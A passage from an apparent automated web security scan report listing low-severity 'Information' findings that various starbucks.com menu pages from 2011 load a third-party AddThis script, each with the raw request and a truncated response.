p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:33:37 GMT
Connection: close
Content-Length: 45236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.152. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/white-chocolate-frappuccino-blended-creme  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/white-chocolate-frappuccino-blended-creme

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/frappuccino-blended-beverages/white-chocolate-frappuccino-blended-creme HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:33:45 GMT
Connection: close
Content-Length: 45078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.153. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/white-chocolate-mocha-frappuccino-blended-coffee  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/white-chocolate-mocha-frappuccino-blended-coffee

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/frappuccino-blended-beverages/white-chocolate-mocha-frappuccino-blended-coffee HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:33:55 GMT
Connection: close
Content-Length: 45376

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.154. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/caramel-apple-spice  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/kids-drinks-and-other/caramel-apple-spice

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/kids-drinks-and-other/caramel-apple-spice HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:34:11 GMT
Connection: close
Content-Length: 40960

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.155. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/cold-apple-juice  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/kids-drinks-and-other/cold-apple-juice

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/kids-drinks-and-other/cold-apple-juice HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:34:14 GMT
Connection: close
Content-Length: 40329

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.156. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/flavored-steamed-milk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/kids-drinks-and-other/flavored-steamed-milk

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/kids-drinks-and-other/flavored-steamed-milk HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:34:24 GMT
Connection: close
Content-Length: 40994

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.157. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/milk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/kids-drinks-and-other/milk

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/kids-drinks-and-other/milk HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:34:37 GMT
Connection: close
Content-Length: 40591

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.158. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/steamed-apple-juice  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/kids-drinks-and-other/steamed-apple-juice

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/kids-drinks-and-other/steamed-apple-juice HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:34:38 GMT
Connection: close
Content-Length: 40405

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.159. http://www.starbucks.com/menu/drinks/tazo-tea/awake  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/awake

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/tazo-tea/awake HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:34:49 GMT
Connection: close
Content-Length: 41941

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.160. http://www.starbucks.com/menu/drinks/tazo-tea/awake-tea-latte  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/awake-tea-latte

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/tazo-tea/awake-tea-latte HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:34:48 GMT
Connection: close
Content-Length: 42070

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.161. http://www.starbucks.com/menu/drinks/tazo-tea/black-shaken-iced-tea  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/black-shaken-iced-tea

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/tazo-tea/black-shaken-iced-tea HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:35:58 GMT
Connection: close
Content-Length: 41948

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.162. http://www.starbucks.com/menu/drinks/tazo-tea/calm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/calm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/tazo-tea/calm HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:36:47 GMT
Connection: close
Content-Length: 41928

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.163. http://www.starbucks.com/menu/drinks/tazo-tea/chai-latte  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/chai-latte

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/tazo-tea/chai-latte HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:36:49 GMT
Connection: close
Content-Length: 42202

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.164. http://www.starbucks.com/menu/drinks/tazo-tea/china-green-tips  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/china-green-tips

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/tazo-tea/china-green-tips HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:36:55 GMT
Connection: close
Content-Length: 41915

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.165. http://www.starbucks.com/menu/drinks/tazo-tea/earl-grey  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/earl-grey

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/tazo-tea/earl-grey HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:36:56 GMT
Connection: close
Content-Length: 41950

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.166. http://www.starbucks.com/menu/drinks/tazo-tea/earl-grey-tea-latte  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/earl-grey-tea-latte

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/tazo-tea/earl-grey-tea-latte HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:37:09 GMT
Connection: close
Content-Length: 42374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.167. http://www.starbucks.com/menu/drinks/tazo-tea/green-tea-latte  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/green-tea-latte

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/tazo-tea/green-tea-latte HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:37:11 GMT
Connection: close
Content-Length: 42113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.168. http://www.starbucks.com/menu/drinks/tazo-tea/iced-awake-tea-latte  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/iced-awake-tea-latte

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/tazo-tea/iced-awake-tea-latte HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:37:11 GMT
Connection: close
Content-Length: 42104

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.169. http://www.starbucks.com/menu/drinks/tazo-tea/iced-chai-tea-latte  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/iced-chai-tea-latte

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/tazo-tea/iced-chai-tea-latte HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:37:28 GMT
Connection: close
Content-Length: 42063

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.170. http://www.starbucks.com/menu/drinks/tazo-tea/iced-green-tea-latte  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/iced-green-tea-latte

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/tazo-tea/iced-green-tea-latte HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:37:50 GMT
Connection: close
Content-Length: 41987

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.171. http://www.starbucks.com/menu/drinks/tazo-tea/orange-blossom  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/orange-blossom

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/tazo-tea/orange-blossom HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
